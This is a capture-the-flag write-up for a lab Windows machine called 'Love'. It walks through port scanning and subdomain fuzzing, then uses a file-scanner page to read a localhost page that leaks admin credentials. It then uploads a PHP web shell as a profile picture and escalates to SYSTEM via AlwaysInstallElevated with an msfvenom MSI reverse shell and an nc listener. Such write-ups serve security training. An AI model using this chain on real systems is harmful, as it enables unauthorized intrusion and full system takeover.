# Love

## Nmap

```
nmap 10.10.10.239 -p 80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001 -sV

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7680/tcp  open  pando-pub?
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
```

After performing standard enumeration against the non HTTP ports we are unable to pull any interesting information.

Looking at the HTTP ports we have 80,443,5000 and 47001. Apart from port 80 we get Forbidden on 443 and 5000. Port 47001 gives us a not found error.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fvl6xShpsyDHI3cSkUOmI%2Fimage.png?alt=media\&token=be52866b-ce19-4741-a251-1f3c4f3d7662)

The root page for 80 takes us to a voters login page.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FfinJqzuiYQWHVOnQROtP%2Fimage.png?alt=media\&token=d15c33ca-3524-4ffd-98e9-bfd9a12e7705)

Directory enumeration with `feroxbuster` shows a few pages of interest. Namely the `/admin` directory which redirects to `/admin/index.php`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F5bcL1O7PUbvfBGvvVejF%2Fimage.png?alt=media\&token=7424408f-a636-43d9-ba34-3456722eed8b)

Again, we are unable to leverage anything too interesting for the moment. I tried logging in with the username "admin" and was sent back an error for incorrect password. Using a different username presents an incorrect username and password error.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F3S0QGI8iduFlQOsE8aMK%2Fimage.png?alt=media\&token=f96f1b1a-82d9-40dc-92a5-b86e17a49a65)

A password brute force on the admin account does not yield any successful logins.

At this point we can perform sub domain enumeration with `wfuzz` to see if we can pull anything of interest.

```
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://love.htb" -H "Host: FUZZ.love.htb" --hl 125
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FIAsBKvSHkQ6rOTroT6BU%2Fimage.png?alt=media\&token=f55a8a3b-1414-4cc1-b043-489a2cef533c)

Here, we get a hit for the "staging" sub domain.

{% hint style="info" %}
Add "10.10.10.239 staging.htb.love" to /etc/hosts.
{% endhint %}

Where the root page for <http://staging.love.htb> takes us to the Free File Scanner page below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fa6A18bbREm6doV8Gl4Ug%2Fimage.png?alt=media\&token=e1ee0001-7899-4bf0-b1e4-9aaf267fefcb)

Checking the link at the drop for "Demo" we are taken to <http://staging.love.htb/beta.php>.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FM9CzKFqrtDxKlLRNwHXI%2Fimage.png?alt=media\&token=c1a091ac-8a54-4e68-ad55-e4c26a8df763)

From here I tried various PHP reverse shells and was unable to get them to execute as expected. Instead, this scanner appears to read the file contents only.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F0XtkvopmHng1dwWgfnok%2Fimage.png?alt=media\&token=536b87b5-f1bb-40d1-a752-3f68cea18feb)

Where this gets interesting, is that it is important to remember, the web server is operating in a different service or user context than us.

We can potentially use this to read the root pages of the otherwise forbidden pages we pulled from initial enumeration.

We can now read the root page for <http://127.0.0.1:5000>.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FgBFP0IIiVhE0U2tJ5IJh%2Fimage.png?alt=media\&token=725423d0-aa27-487e-a8e2-c87d85460dbf)

Here we now the credentials: `admin:@LoveIsInTheAir!!!!`

Which can be used to login at `http://love.htb/admin/index.php`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FRoOe5S43Icd8n8hVKtxc%2Fimage.png?alt=media\&token=cdf233ca-0031-4fb6-86fb-04816374f090)

From here, we notice we can interact with the users profile in the picture and use the "update" button to upload a new profile picture.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FqW9j4XFzmDfBEN8xrOWh%2Fimage.png?alt=media\&token=24517562-0e76-4efc-adc0-b7d2f04d312c)

Knowing the web server is running PHP we can attempt to upload a PHP reverse shell. Using a webshell from: <https://github.com/WhiteWinterWolf/wwwolf-php-webshell>

Upload the shell as a profile picture on the web server. After the uploaded completes click on the profile again and right click -> open image in a new tab to execute the web shell: <http://love.htb/images/shell.php>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F71JrHMLq3q8OZ035r3vY%2Fimage.png?alt=media\&token=86d56432-d45d-4ffe-bfef-93b18da686e3)

After doing some basic enumeration from within the web shell we see AlwaysInstallElevated is set to 0x1 (Enabled).

```
 Value 0x1 represents AlwaysInstallElevated as being enabled.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fp0pxUk0PuXy9k9aCaVdf%2Fimage.png?alt=media\&token=4f596385-ad52-4ca3-a892-081820571d54)

How to perform privilege escalation with AlwaysInstallElevated:

{% embed url="<https://viperone.gitbook.io/pentest-everything/everything/everything-windows/privilege-escalation/registry/registry-alwaysinstallelevated>" %}

Firstly on the attacking system generate a `msfvenom` MSI reverse shell.

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f msi -o Application.msi
```

Then use the web shell to upload the Application.msi

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fu97olCudE14bKgddfctL%2Fimage.png?alt=media\&token=42b4b1e6-d937-42b0-99ed-bf5787dfa6c4)

Then set a `nc` listener the attacking system.

```
sudo nc -lvp 443
```

Then, execute the Application.msi through the web shell.

```
cmd.exe /c C:\xampp\htdocs\omrs\images\Application.msi
```

We then land a SYSTEM shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FvvQvH0tH2pXhyblT0OvL%2Fimage.png?alt=media\&token=1da55de3-0554-4a3f-a30d-1f5dacccb086)